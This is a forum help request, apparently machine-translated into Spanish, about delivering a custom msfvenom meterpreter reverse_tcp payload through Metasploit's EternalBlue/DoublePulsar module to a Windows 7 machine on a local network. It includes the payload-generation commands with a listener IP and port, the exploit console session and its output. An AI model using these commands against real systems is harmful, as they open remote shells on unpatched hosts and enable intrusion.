He generado una carga útil personalizada utilizando msfvenom como tal ( Primero quiero probar con la carga útil personalizada más simple: sin codificador ni nada ):
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.117 LPORT=4444 -f exe -o payload.exe
y también he hecho una versión de rubí (pensé que el tamaño podría tener algo que ver con eso):
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.117 LPORT=4444 -f ruby -o payload.rb
Mi objetivo es Windows 7 Ultimate x64 .
Estoy utilizando el windows/smb/eternalblue_doublepulsar
exploit y hasta ahora nunca me ha fallado.
Estas son algunas de las preguntas lado que tengo:
- ¿Qué es
PAYLOADSTR
y cómo lo uso? - ¿Es necesario
/root/
antes del nombre de archivo? (Obtengo el mismo resultado con él y sin él)
Aquí está mi intento y la salida:
msf exploit(windows/smb/eternalblue_doublepulsar) > set payload generic/custom
payload => generic/custom
msf exploit(windows/smb/eternalblue_doublepulsar) > set payloadfile /root/payload.exe
payloadfile => /root/payload.exe
msf exploit(windows/smb/eternalblue_doublepulsar) > exploit
[-] 192.168.1.102:445 - Exploit failed: No encoders encoded the buffer successfully.
[*] Exploit completed, but no session was created.
msf exploit(windows/smb/eternalblue_doublepulsar) > set payloadstr C:\
payloadstr => C:\
msf exploit(windows/smb/eternalblue_doublepulsar) > exploit
[*] 192.168.1.102:445 - Generating Eternalblue XML data
[*] 192.168.1.102:445 - Generating Doublepulsar XML data
[*] 192.168.1.102:445 - Generating payload DLL for Doublepulsar
[*] 192.168.1.102:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.1.102:445 - Launching Eternalblue...
000f:err:service:process_send_command receiving command result timed out
[+] 192.168.1.102:445 - Backdoor is already installed
[*] 192.168.1.102:445 - Launching Doublepulsar...
000f:err:service:process_send_command receiving command result timed out
Error sending wrong architecture DLL to target
[+] 192.168.1.102:445 - Remote code executed... 3... 2... 1...
[*] Exploit completed, but no session was created.
msf exploit(windows/smb/eternalblue_doublepulsar) > set payloadstr C:\payload.exe
payloadstr => C:\payload.exe
msf exploit(windows/smb/eternalblue_doublepulsar) > exploit
[*] 192.168.1.102:445 - Generating Eternalblue XML data
[*] 192.168.1.102:445 - Generating Doublepulsar XML data
[*] 192.168.1.102:445 - Generating payload DLL for Doublepulsar
[*] 192.168.1.102:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.1.102:445 - Launching Eternalblue...
000f:err:service:process_send_command receiving command result timed out
[+] 192.168.1.102:445 - Backdoor is already installed
[*] 192.168.1.102:445 - Launching Doublepulsar...
000f:err:service:process_send_command receiving command result timed out
Error sending wrong architecture DLL to target
[+] 192.168.1.102:445 - Remote code executed... 3... 2... 1...
[*] Exploit completed, but no session was created.
msf exploit(windows/smb/eternalblue_doublepulsar) > show options
Module options (exploit/windows/smb/eternalblue_doublepulsar):
Name Current Setting Required Description
---- --------------- -------- -----------
DOUBLEPULSARPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Doublepulsar
ETERNALBLUEPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Eternalblue
PROCESSINJECT explorer.exe yes Name of process to inject into (Change to lsass.exe for x64)
RHOST 192.168.1.102 yes The target address
RPORT 445 yes The SMB service port (TCP)
TARGETARCHITECTURE x64 yes Target Architecture (Accepted: x86, x64)
WINEPATH /root/.wine/drive_c/ yes WINE drive_c path
Payload options (generic/custom):
Name Current Setting Required Description
---- --------------- -------- -----------
PAYLOADFILE /root/payload.exe no The file to read the payload from
PAYLOADSTR C:\payload.exe no The string to use as a payload
Exploit target:
Id Name
-- ----
8 Windows 7 (all services pack) (x86) (x64)
He buscado en todas partes, pero no pude encontrar una solución, así que, como última esperanza, estoy publicando una pregunta aquí.
Cualquier ayuda es apreciada.